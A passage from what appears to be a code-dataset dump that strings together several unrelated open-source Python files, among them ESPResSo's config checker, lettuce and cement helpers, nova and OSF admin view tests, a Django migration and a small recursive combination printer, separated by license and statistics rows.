assert d.get_version('key', 1) == 5
assert d.get_version('key', 2) == 6
assert d.get_version('key', 3) == 7
with pytest.raises(KeyError) as exc:
d['missing']
def test_get_missing(self):
d = VersionedDict()
d['key', 1] = 5
with pytest.raises(KeyError) as exc:
d.get_version('key', 2)
assert exc.value.args[0] == 'No value associated with version 2 of key'
def test_contains(self):
d = VersionedDict()
assert 'key' not in d
d['key', 1] = 3
assert 'key' in d
def test_overwrite_forbidden(self):
d = VersionedDict()
d['key', 1] = 3
with pytest.raises(KeyError) as exc:
d['key', 1] = 3
def test_noninteger_version(self):
d = VersionedDict()
with pytest.raises(ValueError) as exc:
d['key', 'bad'] = 4
| bsd-3-clause | 7,194,414,388,734,389,000 | 27.384279 | 87 | 0.575231 | false |
mkuron/espresso | src/config/check_myconfig.py | 1 | 3768 | # Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from subprocess import CalledProcessError
from defines import Defines
import featuredefs
def damerau_levenshtein_distance(s1, s2):
d = {}
lenstr1 = len(s1)
lenstr2 = len(s2)
for i in range(-1, lenstr1 + 1):
d[(i, -1)] = i + 1
for j in range(-1, lenstr2 + 1):
d[(-1, j)] = j + 1
for i in range(lenstr1):
for j in range(lenstr2):
if s1[i] == s2[j]:
cost = 0
else:
cost = 1
d[(i, j)] = min(
d[(i - 1, j)] + 1, # deletion
d[(i, j - 1)] + 1, # insertion
d[(i - 1, j - 1)] + cost, # substitution
)
if i and j and s1[i] == s2[j - 1] and s1[i - 1] == s2[j]:
d[(i, j)] = min(d[(i, j)], d[i - 2, j - 2] + cost)
# transposition
return d[lenstr1 - 1, lenstr2 - 1]
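# Illustrative calls (added for clarity; not part of the original script).
# Each example differs from its target by exactly one edit:
#   damerau_levenshtein_distance("FEATURE", "FEATRE")    -> 1  (deletion)
#   damerau_levenshtein_distance("myconfig", "myconfgi") -> 1  (transposition)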
def handle_unknown(f, all_features):
match = None
max_dist = max(2, len(f) // 2)
for d in all_features:
dist = damerau_levenshtein_distance(f, d)
        if dist < max_dist:
            # narrow the threshold so only strictly closer candidates can
            # replace the current best match
            max_dist = dist
            match = d
if match:
print("Unknown feature '{}', did you mean '{}'?".format(f, match))
else:
print("Unknown feature '{}'".format(f))
class FeatureError(Exception):
pass
def print_exception(ex):
print("""Skipped external header because {} returned non-zero exit code {},
output: {}.""".format(' '.join(ex.cmd), ex.returncode, ex.output.strip()))
def check_myconfig(compiler, feature_file, myconfig, pre_header=None):
# This does not work on all compilers, so if the parsing fails
# we just bail out.
external_defs = []
if pre_header:
try:
external_features = Defines(compiler).defines(pre_header)
except CalledProcessError as ex:
print_exception(ex)
return
external_defs = ['-D' + s for s in external_features]
try:
my_features = Defines(compiler, flags=external_defs).defines(myconfig)
except CalledProcessError as ex:
print_exception(ex)
return
# Parse feature file
defs = featuredefs.defs(feature_file)
error_state = False
for e in (my_features & defs.externals):
error_state = True
my_features.remove(e)
print(
"External feature '{}' can not be defined in myconfig.".format(e))
for u in (my_features - defs.features):
if u.startswith('__'):
continue
error_state = True
handle_unknown(u, defs.features)
if error_state:
        raise FeatureError("There were errors in '{}'".format(myconfig))
else:
return
if __name__ == "__main__":
if len(sys.argv) > 4:
pre_header = sys.argv[4]
else:
pre_header = None
try:
check_myconfig(sys.argv[1], sys.argv[2], sys.argv[3], pre_header)
sys.exit()
except FeatureError:
sys.exit("There were errors in '{}'".format(sys.argv[3]))
| gpl-3.0 | 4,629,193,591,994,059,000 | 28.904762 | 87 | 0.57776 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/lettuce/django/apps.py | 1 | 3009 | # -*- coding: utf-8 -*-
# <Lettuce - Behaviour Driven Development for python>
# Copyright (C) <2010-2012> Gabriel Falcão <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import join, dirname
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.apps import apps as django_apps
from django.conf import settings
def _filter_builtins(module):
"returns only those apps that are not builtin django.contrib"
name = module.__name__
return not name.startswith("django.contrib") and name != 'lettuce.django'
def _filter_configured_apps(module):
"returns only those apps that are in django.conf.settings.LETTUCE_APPS"
app_found = True
if hasattr(settings, 'LETTUCE_APPS') and isinstance(settings.LETTUCE_APPS, tuple):
app_found = False
for appname in settings.LETTUCE_APPS:
if module.__name__.startswith(appname):
app_found = True
return app_found
def _filter_configured_avoids(module):
"returns apps that are not within django.conf.settings.LETTUCE_AVOID_APPS"
run_app = False
if hasattr(settings, 'LETTUCE_AVOID_APPS') and isinstance(settings.LETTUCE_AVOID_APPS, tuple):
for appname in settings.LETTUCE_AVOID_APPS:
if module.__name__.startswith(appname):
run_app = True
return not run_app
def get_apps():
return [app_cfg.module for app_cfg in django_apps.get_app_configs()]
def harvest_lettuces(only_the_apps=None, avoid_apps=None, path="features"):
"""gets all installed apps that are not from django.contrib
returns a list of tuples with (path_to_app, app_module)
"""
apps = get_apps()
if isinstance(only_the_apps, tuple) and any(only_the_apps):
def _filter_only_specified(module):
return module.__name__ in only_the_apps
apps = filter(_filter_only_specified, apps)
else:
        apps = filter(_filter_builtins, apps)
apps = filter(_filter_configured_apps, apps)
apps = filter(_filter_configured_avoids, apps)
if isinstance(avoid_apps, tuple) and any(avoid_apps):
def _filter_avoid(module):
return module.__name__ not in avoid_apps
apps = filter(_filter_avoid, apps)
joinpath = lambda app: (join(dirname(app.__file__), path), app)
return map(joinpath, apps)
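# Illustrative return value of harvest_lettuces() (an assumed example for
# clarity, not part of the original module): a list of (features_dir, module)
# pairs such as [('/path/to/myapp/features', <module 'myapp'>), ...], already
# filtered by the LETTUCE_APPS / LETTUCE_AVOID_APPS settings.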
| agpl-3.0 | -8,298,065,788,740,383,000 | 34.388235 | 98 | 0.691822 | false |
rjdp/cement | cement/ext/ext_dummy.py | 1 | 6538 | """Dummy Framework Extension"""
from ..core import backend, output, handler, mail
from ..utils.misc import minimal_logger
LOG = minimal_logger(__name__)
class DummyOutputHandler(output.CementOutputHandler):
"""
This class is an internal implementation of the
:ref:`IOutput <cement.core.output>` interface. It does not take any
parameters on initialization, and does not actually output anything.
"""
class Meta:
"""Handler meta-data"""
interface = output.IOutput
"""The interface this class implements."""
label = 'dummy'
"""The string identifier of this handler."""
display_override_option = False
def render(self, data_dict, template=None):
"""
This implementation does not actually render anything to output, but
rather logs it to the debug facility.
:param data_dict: The data dictionary to render.
:param template: The template parameter is not used by this
implementation at all.
:returns: None
"""
LOG.debug("not rendering any output to console")
LOG.debug("DATA: %s" % data_dict)
return None
class DummyMailHandler(mail.CementMailHandler):
"""
This class implements the :ref:`IMail <cement.core.mail>`
interface, but is intended for use in development as no email is actually
sent.
**Usage**
.. code-block:: python
class MyApp(CementApp):
class Meta:
label = 'myapp'
mail_handler = 'dummy'
# create, setup, and run the app
app = MyApp()
app.setup()
app.run()
# fake sending an email message
app.mail.send('This is my fake message',
subject='This is my subject',
to=['[email protected]', '[email protected]'],
from_addr='[email protected]',
)
The above will print the following to console:
.. code-block:: text
======================================================================
DUMMY MAIL MESSAGE
----------------------------------------------------------------------
To: [email protected], [email protected]
From: [email protected]
CC:
BCC:
Subject: This is my subject
---
This is my fake message
----------------------------------------------------------------------
**Configuration**
This handler supports the following configuration settings:
* **to** - Default ``to`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **from_addr** - Default ``from_addr`` address
* **cc** - Default ``cc`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **bcc** - Default ``bcc`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **subject** - Default ``subject``
* **subject_prefix** - Additional string to prepend to the ``subject``
You can add these to any application configuration file under a
``[mail.dummy]`` section, for example:
**~/.myapp.conf**
.. code-block:: text
[myapp]
# set the mail handler to use
mail_handler = dummy
[mail.dummy]
# default to addresses (comma separated list)
to = [email protected]
# default from address
from = [email protected]
# default cc addresses (comma separated list)
cc = [email protected], [email protected]
# default bcc addresses (comma separated list)
bcc = [email protected], [email protected]
# default subject
subject = This is The Default Subject
# additional prefix to prepend to the subject
subject_prefix = MY PREFIX >
"""
class Meta:
#: Unique identifier for this handler
label = 'dummy'
def _get_params(self, **kw):
params = dict()
for item in ['to', 'from_addr', 'cc', 'bcc', 'subject']:
config_item = self.app.config.get(self._meta.config_section, item)
params[item] = kw.get(item, config_item)
# also grab the subject_prefix
params['subject_prefix'] = self.app.config.get(
self._meta.config_section,
'subject_prefix'
)
return params
def send(self, body, **kw):
"""
Mimic sending an email message, but really just print what would be
sent to console. Keyword arguments override configuration
defaults (cc, bcc, etc).
:param body: The message body to send
:type body: multiline string
:keyword to: List of recipients (generally email addresses)
:type to: list
:keyword from_addr: Address (generally email) of the sender
:type from_addr: string
:keyword cc: List of CC Recipients
:type cc: list
:keyword bcc: List of BCC Recipients
:type bcc: list
:keyword subject: Message subject line
:type subject: string
:returns: Boolean (``True`` if message is sent successfully, ``False``
otherwise)
**Usage**
.. code-block:: python
# Using all configuration defaults
app.mail.send('This is my message body')
# Overriding configuration defaults
app.mail.send('My message body'
to=['[email protected]'],
from_addr='[email protected]',
cc=['[email protected]', '[email protected]'],
subject='This is my subject',
)
"""
# shorted config values
params = self._get_params(**kw)
msg = "\n" + "=" * 77 + "\n"
msg += "DUMMY MAIL MESSAGE\n"
msg += "-" * 77 + "\n\n"
msg += "To: %s\n" % ', '.join(params['to'])
msg += "From: %s\n" % params['from_addr']
msg += "CC: %s\n" % ', '.join(params['cc'])
msg += "BCC: %s\n" % ', '.join(params['bcc'])
if params['subject_prefix'] not in [None, '']:
msg += "Subject: %s %s\n\n---\n\n" % (params['subject_prefix'],
params['subject'])
else:
msg += "Subject: %s\n\n---\n\n" % params['subject']
msg += body + "\n"
msg += "\n" + "-" * 77 + "\n"
print(msg)
return True
def load(app):
handler.register(DummyOutputHandler)
handler.register(DummyMailHandler)
| bsd-3-clause | 3,786,560,060,303,839,700 | 28.318386 | 78 | 0.547568 | false |
OpenAcademy-OpenStack/nova-scheduler | nova/tests/api/openstack/compute/plugins/v3/admin_only_action_common.py | 1 | 6858 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.compute import vm_states
import nova.context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import test
from nova.tests import fake_instance
class CommonMixin(object):
def setUp(self):
super(CommonMixin, self).setUp()
self.compute_api = None
self.context = nova.context.RequestContext('fake', 'fake')
def _make_request(self, url, body):
req = webob.Request.blank('/v3' + url)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.content_type = 'application/json'
return req.get_response(self.app)
def _stub_instance_get(self, uuid=None):
if uuid is None:
uuid = uuidutils.generate_uuid()
instance = fake_instance.fake_instance_obj(self.context,
id=1, uuid=uuid, vm_state=vm_states.ACTIVE,
task_state=None, launched_at=timeutils.utcnow())
self.compute_api.get(self.context, uuid,
want_objects=True).AndReturn(instance)
return instance
def _stub_instance_get_failure(self, exc_info, uuid=None):
if uuid is None:
uuid = uuidutils.generate_uuid()
self.compute_api.get(self.context, uuid,
want_objects=True).AndRaise(exc_info)
return uuid
def _test_non_existing_instance(self, action, body_map=None):
uuid = uuidutils.generate_uuid()
self._stub_instance_get_failure(
exception.InstanceNotFound(instance_id=uuid), uuid=uuid)
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % uuid,
{action: body_map.get(action)})
self.assertEqual(404, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_action(self, action, body=None, method=None):
if method is None:
method = action
instance = self._stub_instance_get()
getattr(self.compute_api, method)(self.context, instance)
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: None})
self.assertEqual(202, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_invalid_state(self, action, method=None, body_map=None,
compute_api_args_map=None):
if method is None:
method = action
if body_map is None:
body_map = {}
if compute_api_args_map is None:
compute_api_args_map = {}
instance = self._stub_instance_get()
args, kwargs = compute_api_args_map.get(action, ((), {}))
getattr(self.compute_api, method)(self.context, instance,
*args, **kwargs).AndRaise(
exception.InstanceInvalidState(
attr='vm_state', instance_uuid=instance.uuid,
state='foo', method=method))
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: body_map.get(action)})
self.assertEqual(409, res.status_int)
self.assertIn("Cannot \'%s\' while instance" % action, res.body)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
def _test_locked_instance(self, action, method=None):
if method is None:
method = action
instance = self._stub_instance_get()
getattr(self.compute_api, method)(self.context, instance).AndRaise(
exception.InstanceIsLocked(instance_uuid=instance.uuid))
self.mox.ReplayAll()
res = self._make_request('/servers/%s/action' % instance.uuid,
{action: None})
self.assertEqual(409, res.status_int)
# Do these here instead of tearDown because this method is called
# more than once for the same test case
self.mox.VerifyAll()
self.mox.UnsetStubs()
class CommonTests(CommonMixin, test.NoDBTestCase):
def _test_actions(self, actions, method_translations={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_action(action, method=method)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_with_non_existed_instance(self, actions, body_map={}):
for action in actions:
self._test_non_existing_instance(action,
body_map=body_map)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_raise_conflict_on_invalid_state(
self, actions, method_translations={}, body_map={}, args_map={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_invalid_state(action, method=method,
body_map=body_map,
compute_api_args_map=args_map)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
def _test_actions_with_locked_instance(self, actions,
method_translations={}):
for action in actions:
method = method_translations.get(action)
self.mox.StubOutWithMock(self.compute_api, method or action)
self._test_locked_instance(action, method=method)
# Re-mock this.
self.mox.StubOutWithMock(self.compute_api, 'get')
| apache-2.0 | 5,842,236,295,433,586,000 | 38.872093 | 77 | 0.6028 | false |
nloyolag/music-albums | music_albums/migrations/0001_initial.py | 1 | 2519 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-21 20:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500, verbose_name='Title')),
('release_date', models.DateTimeField(blank=True, verbose_name='Release date')),
('rating', models.IntegerField(blank=True, choices=[(1, '★'), (2, '★★'), (3, '★★★'), (4, '★★★★'), (5, '★★★★★')], verbose_name='Rating')),
('cover', models.ImageField(default='images/albums/default.jpg', upload_to='images/albums', verbose_name='Cover')),
],
options={
'verbose_name': 'Album',
'verbose_name_plural': 'Albums',
},
),
migrations.CreateModel(
name='Artist',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500, verbose_name='Name')),
('albums', models.ManyToManyField(related_name='artists', to='music_albums.Album', verbose_name='Albums')),
],
options={
'verbose_name': 'Artist',
'verbose_name_plural': 'Artists',
},
),
migrations.CreateModel(
name='Label',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500, verbose_name='Name')),
('is_operating', models.BooleanField(default=True, verbose_name='Is operating')),
],
options={
'verbose_name': 'Record Label',
'verbose_name_plural': 'Record Labels',
},
),
migrations.AddField(
model_name='album',
name='label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='album', to='music_albums.Label', verbose_name='Record Label'),
),
]
| mit | -5,822,098,756,944,028,000 | 40.483333 | 180 | 0.540779 | false |
akkinitsch/AdvancedMockupStringExtractor | TextFormatFixer.py | 1 | 2713 | # coding: utf-8
'''
The MIT License (MIT)
Copyright (c) 2014 Andreas "Akki" Nitsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import re
class TextFormatFixer():
"""Class that fixes format from balsamiq-mockups to plain text."""
def __init__(self):
pass
@staticmethod
def fix_text(text):
"""Wrapper that uses all static methods of this class on an text.
Keyword arguments:
@param text: Text containing fext-formats that are not wanted for use in software and that should be corrected.
"""
result = TextFormatFixer.replace_html_whitespaces(text)
result = TextFormatFixer.remove_leading_trailing_spaces(result)
result = TextFormatFixer.remove_spaces_after_br(result)
return result
@staticmethod
def remove_leading_trailing_spaces(text):
"""Removes leading and trailing whitespaces from input-string
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return text.strip()
except:
return ''
@staticmethod
def replace_html_whitespaces(text):
"""Replacing spaces in html-syntax with spaces.
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return text.replace('%20', ' ')
except:
return ''
@staticmethod
def remove_spaces_after_br(text):
"""Remove leading whitespaces after an br-tag.
Keyword arguments:
@param text: Text that should be corrected.
"""
try:
return re.sub(r'<br />[ ]*', '<br />', text)
except:
return ''
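# Illustrative usage (an assumed example for clarity, not part of the original
# module):
#   TextFormatFixer.fix_text(' Label%20text<br />   next line ')
#   returns 'Label text<br />next line'
# i.e. '%20' becomes a space, leading/trailing whitespace is stripped and
# spaces directly after '<br />' are removed.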
| mit | -8,029,390,144,403,699,000 | 32.9125 | 123 | 0.669001 | false |
smileboywtu/Code-Interview | combination.py | 1 | 1331 | # list all the combinations using a recursive method
# use python 3.5 as default
"""
c(4, 2):
{1,2,3,4}
/ | \\
/ | \\
1{2,3,4} 2{3,4} 3{4}
/ | \ / \ |
1, 2 1,3 1,4 2,3 2,4 3,4
"""
def combinationiterator(set, start, end, current, choose):
"iterate the elements in set"
if current is choose:
for index in range(choose):
print(set[index], end=' ')
print()
else:
for index in range(start, end):
            # prune: recurse only while enough elements remain (end - index) to fill the remaining slots (choose - current)
if end - index >= choose - current:
set.append(index + 1)
                # recurse from index + 1 (not start + 1) so each element is used at most once and combinations stay in increasing order
combinationiterator(set.copy(), index+1, end, current+1, choose)
set.pop()
def combination(m, n):
"interface to create the combination list"
set = []
combinationiterator(set, 0, m, 0, n)
print("""
combination using recursive method
C(3, 2):
1, 2
1, 3
2, 3
""")
m = 3
n = 2
print("choose n=", n, "in group of m=", m, "members")
combination(m, n)
input("\n\nPress Enter to exit.")
| gpl-2.0 | 6,553,644,880,663,066,000 | 25.098039 | 80 | 0.449286 | false |
chennan47/osf.io | admin_tests/users/test_views.py | 1 | 29346 | import mock
import csv
import furl
import pytz
import pytest
from datetime import datetime, timedelta
from nose import tools as nt
from django.test import RequestFactory
from django.http import Http404
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from django.core.exceptions import PermissionDenied
from django.contrib.auth.models import Permission
from tests.base import AdminTestCase
from website import settings
from framework.auth import Auth
from osf.models.user import OSFUser
from osf.models.tag import Tag
from osf_tests.factories import (
UserFactory,
AuthUserFactory,
ProjectFactory,
TagFactory,
UnconfirmedUserFactory
)
from admin_tests.utilities import setup_view, setup_log_view, setup_form_view
from admin.users import views
from admin.users.forms import WorkshopForm, UserSearchForm, MergeUserForm
from osf.models.admin_log_entry import AdminLogEntry
pytestmark = pytest.mark.django_db
class TestUserView(AdminTestCase):
def test_no_guid(self):
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request)
with nt.assert_raises(AttributeError):
view.get_object()
def test_load_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request, guid=guid)
res = view.get_object()
nt.assert_is_instance(res, dict)
def test_name_data(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get('/fake_path')
view = views.UserView()
view = setup_view(view, request, guid=guid)
temp_object = view.get_object()
view.object = temp_object
res = view.get_context_data()
nt.assert_equal(res[views.UserView.context_object_name], temp_object)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:user', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
views.UserView.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
view_permission = Permission.objects.get(codename='view_osfuser')
user.user_permissions.add(view_permission)
user.save()
request = RequestFactory().get(reverse('users:user', kwargs={'guid': guid}))
request.user = user
response = views.UserView.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestResetPasswordView(AdminTestCase):
def setUp(self):
super(TestResetPasswordView, self).setUp()
self.user = UserFactory()
self.request = RequestFactory().get('/fake_path')
self.request.user = self.user
self.plain_view = views.ResetPasswordView
self.view = setup_view(self.plain_view(), self.request, guid=self.user._id)
def test_get_initial(self):
self.view.user = self.user
self.view.get_initial()
res = self.view.initial
nt.assert_is_instance(res, dict)
nt.assert_equal(res['guid'], self.user._id)
nt.assert_equal(res['emails'], [(r, r) for r in self.user.emails.values_list('address', flat=True)])
def test_reset_password_context(self):
self.view.user = self.user
res = self.view.get_context_data()
nt.assert_is_instance(res, dict)
nt.assert_in((self.user.emails.first().address, self.user.emails.first().address), self.view.initial['emails'])
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:reset_password', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
views.ResetPasswordView.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:reset_password', kwargs={'guid': guid}))
request.user = user
response = views.ResetPasswordView.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestDisableUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.UserDeleteView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_reactivate_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
self.view().delete(self.request)
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_false(self.user.requested_deactivation)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
def test_no_user(self):
view = setup_view(views.UserDeleteView(), self.request, guid='meh')
with nt.assert_raises(Http404):
view.delete(self.request)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:disable', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:disable', kwargs={'guid': guid}))
request.user = user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestHamUserRestore(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.request = RequestFactory().post('/fake_path')
self.view = views.HamUserRestoreView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
self.spam_confirmed, created = Tag.objects.get_or_create(name='spam_confirmed')
self.ham_confirmed, created = Tag.objects.get_or_create(name='ham_confirmed')
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_enable_user(self):
self.user.disable_account()
self.user.save()
nt.assert_true(self.user.is_disabled)
self.view().delete(self.request)
self.user.reload()
nt.assert_false(self.user.is_disabled)
nt.assert_false(self.user.all_tags.filter(name=self.spam_confirmed.name).exists())
nt.assert_true(self.user.all_tags.filter(name=self.ham_confirmed.name).exists())
class TestDisableSpamUser(AdminTestCase):
def setUp(self):
self.user = UserFactory()
self.public_node = ProjectFactory(creator=self.user, is_public=True)
self.private_node = ProjectFactory(creator=self.user, is_public=False)
self.request = RequestFactory().post('/fake_path')
self.view = views.SpamUserDeleteView
self.view = setup_log_view(self.view, self.request, guid=self.user._id)
def test_get_object(self):
obj = self.view().get_object()
nt.assert_is_instance(obj, OSFUser)
def test_get_context(self):
res = self.view().get_context_data(object=self.user)
nt.assert_in('guid', res)
nt.assert_equal(res.get('guid'), self.user._id)
def test_disable_spam_user(self):
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
count = AdminLogEntry.objects.count()
self.view().delete(self.request)
self.user.reload()
self.public_node.reload()
nt.assert_true(self.user.is_disabled)
nt.assert_true(self.user.all_tags.filter(name='spam_confirmed').exists())
nt.assert_false(self.public_node.is_public)
nt.assert_equal(AdminLogEntry.objects.count(), count + 3)
def test_no_user(self):
view = setup_view(self.view(), self.request, guid='meh')
with nt.assert_raises(Http404):
view.delete(self.request)
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(reverse('users:spam_disable', kwargs={'guid': guid}))
request.user = user
with self.assertRaises(PermissionDenied):
self.view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
change_permission = Permission.objects.get(codename='change_osfuser')
user.user_permissions.add(change_permission)
user.save()
request = RequestFactory().get(reverse('users:spam_disable', kwargs={'guid': guid}))
request.user = user
response = self.view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class SpamUserListMixin(object):
def setUp(self):
spam_flagged = TagFactory(name='spam_flagged')
spam_confirmed = TagFactory(name='spam_confirmed')
ham_confirmed = TagFactory(name='ham_confirmed')
self.flagged_user = UserFactory()
self.flagged_user.tags.add(spam_flagged)
self.flagged_user.save()
self.spam_user = UserFactory()
self.spam_user.tags.add(spam_confirmed)
self.spam_user.save()
self.ham_user = UserFactory()
self.ham_user.tags.add(ham_confirmed)
self.ham_user.save()
self.request = RequestFactory().post('/fake_path')
def test_no_user_permissions_raises_error(self):
user = UserFactory()
guid = user._id
request = RequestFactory().get(self.url)
request.user = user
with self.assertRaises(PermissionDenied):
self.plain_view.as_view()(request, guid=guid)
def test_correct_view_permissions(self):
user = UserFactory()
guid = user._id
view_permission = Permission.objects.get(codename='view_osfuser')
spam_permission = Permission.objects.get(codename='view_spam')
user.user_permissions.add(view_permission)
user.user_permissions.add(spam_permission)
user.save()
request = RequestFactory().get(self.url)
request.user = user
response = self.plain_view.as_view()(request, guid=guid)
self.assertEqual(response.status_code, 200)
class TestFlaggedSpamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestFlaggedSpamUserList, self).setUp()
self.plain_view = views.UserFlaggedSpamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:flagged-spam')
def test_get_queryset(self):
qs = self.view.get_queryset()
nt.assert_equal(qs.count(), 1)
nt.assert_equal(qs[0]._id, self.flagged_user._id)
class TestConfirmedSpamUserList(SpamUserListMixin, AdminTestCase):
def setUp(self):
super(TestConfirmedSpamUserList, self).setUp()
self.plain_view = views.UserKnownSpamList
self.view = setup_log_view(self.plain_view(), self.request)
self.url = reverse('users:known-spam')
def test_get_queryset(self):
